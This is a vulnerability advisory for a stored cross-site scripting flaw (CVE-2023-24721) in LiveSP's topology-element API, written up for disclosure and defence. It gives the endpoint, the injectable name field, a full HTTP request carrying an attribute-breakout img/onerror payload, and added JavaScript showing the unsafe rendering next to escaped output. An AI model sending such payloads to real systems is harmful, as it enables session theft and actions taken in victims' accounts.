CVE-2023-24721.md
Description

An issue was discovered in LiveSP through v.21.1.2. An authenticated attacker can store arbitrary JavaScript in the name of a topology element. The payload then executes in the browser of every authenticated user who views the page on which that element is rendered.

POC

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source, stores it, and later includes it in HTTP responses without encoding it for the context in which it is rendered. The attacker-supplied script runs in the victim's origin and can steal session tokens or credentials, perform arbitrary actions on the victim's behalf, or log their keystrokes. Any function that stores request parameters, headers or body fields is a potential entry point, as is any out-of-band channel that feeds data into the application (for example, email messages received over SMTP that are later rendered by a web mail client).

Stored XSS is typically more serious than reflected XSS because the attacker needs no separate delivery mechanism (no crafted link has to be sent to the victim), and because it is not affected by browser-side reflected-XSS filters, which modern browsers no longer ship in any case. Depending on the affected page, ordinary users are exploited simply by using the application normally. In some situations this can be used to build a web application worm that spreads from user to user and ultimately compromises every active account.

Affected Endpoint

  • URL: https://[ip:port]/va/service/bach/topology/element (HTTP POST, JSON body)
  • Injection point: the attributes.name field of the JSON request body
  • Rendered at: https://[hostname:port]/va/cluster

Technical Details

In this specific instance, the API under /va/service/bach/topology/element accepts a JSON body describing a topology element and stores the attributes.name field without validation or encoding. The payload used below starts with "> so that, wherever the name is later written into an attribute value, it closes that attribute and its enclosing tag; the following <img> element has an invalid src, so its onerror handler fires as soon as the page renders. The HTTP request/response pair is shown below.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1
Host: [REDACTED]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: [REDACTED]
Content-Type: application/json
Content-Length: 175
Origin: [REDACTED]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\"><img src='x' onerror='alert(\"pwned\")'>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":[]}}

HTTP Response:

HTTP/1.1 201 Created
Server: [REDACTED]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: [...]
Access-Control-Allow-Origin: *
Referrer-Policy: strict-origin

[...]

The 201 Created response confirms that the element, and with it the payload, was stored. From this point on, whenever an authenticated user opens https://[hostname:port]/va/cluster, where the element name is rendered into the page unencoded, the injected script executes in the victim's browser.

[Screenshot: xss]
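The rendering defect described in the stored-XSS explanation above, and the way the PoC payload abuses it, as an added example that is not part of the original PoC and not LiveSP's own code. It assumes a client-side template that concatenates the stored element name into HTML; the template, the function names and the "two tags per template" check are hypothetical, while the payload is exactly the string sent in the attributes.name field of the request above. The hardened version shows the fix: context-appropriate output encoding of every untrusted value.

```javascript
// Added example (not LiveSP code): how a stored element name reaches the DOM
// unsafely, and the output-encoding fix. The payload is the one from the PoC
// request; the render templates and function names are assumptions.

// The exact string sent in the "attributes.name" field of the PoC request.
const PAYLOAD = `"><img src='x' onerror='alert("pwned")'>`;

// Hypothetical vulnerable rendering: the stored name is concatenated straight
// into markup, once in an attribute context and once in a text context. The
// leading `">` of the payload closes the title attribute and the <span> start
// tag, so the <img> that follows becomes a real element and its onerror
// handler runs when the (invalid) image fails to load.
function renderElementUnsafe(name) {
  return `<span class="element" title="${name}">${name}</span>`;
}

// Minimal HTML entity encoding, sufficient for text content and for values
// placed inside double-quoted attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: the untrusted value is encoded before it is placed in
// either context, so the browser displays the payload as literal text.
function renderElementSafe(name) {
  const safe = escapeHtml(name);
  return `<span class="element" title="${safe}">${safe}</span>`;
}

// Cheap regression check for a test suite or a proxy script: count the '<'
// characters in the produced markup. The template itself contributes exactly
// two ("<span" and "</span"); anything beyond that came from the untrusted
// value and is injected markup.
function countTagOpeners(html) {
  return (html.match(/</g) || []).length;
}

function injectedTagCount(html) {
  const TEMPLATE_TAGS = 2; // assumption tied to the template above
  return countTagOpeners(html) - TEMPLATE_TAGS;
}

// Usage: compare both renderings of the PoC payload.
console.log('unsafe injected tags:', injectedTagCount(renderElementUnsafe(PAYLOAD))); // 2
console.log('safe   injected tags:', injectedTagCount(renderElementSafe(PAYLOAD)));   // 0
```

In real browser code the equivalent fix is to stop building markup from strings altogether: create the element, set the name with `textContent` and `setAttribute`, and never pass untrusted data to `innerHTML`. A Content-Security-Policy that disallows inline event handlers would additionally block this particular payload, but it is a defence in depth, not a substitute for encoding.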

Reference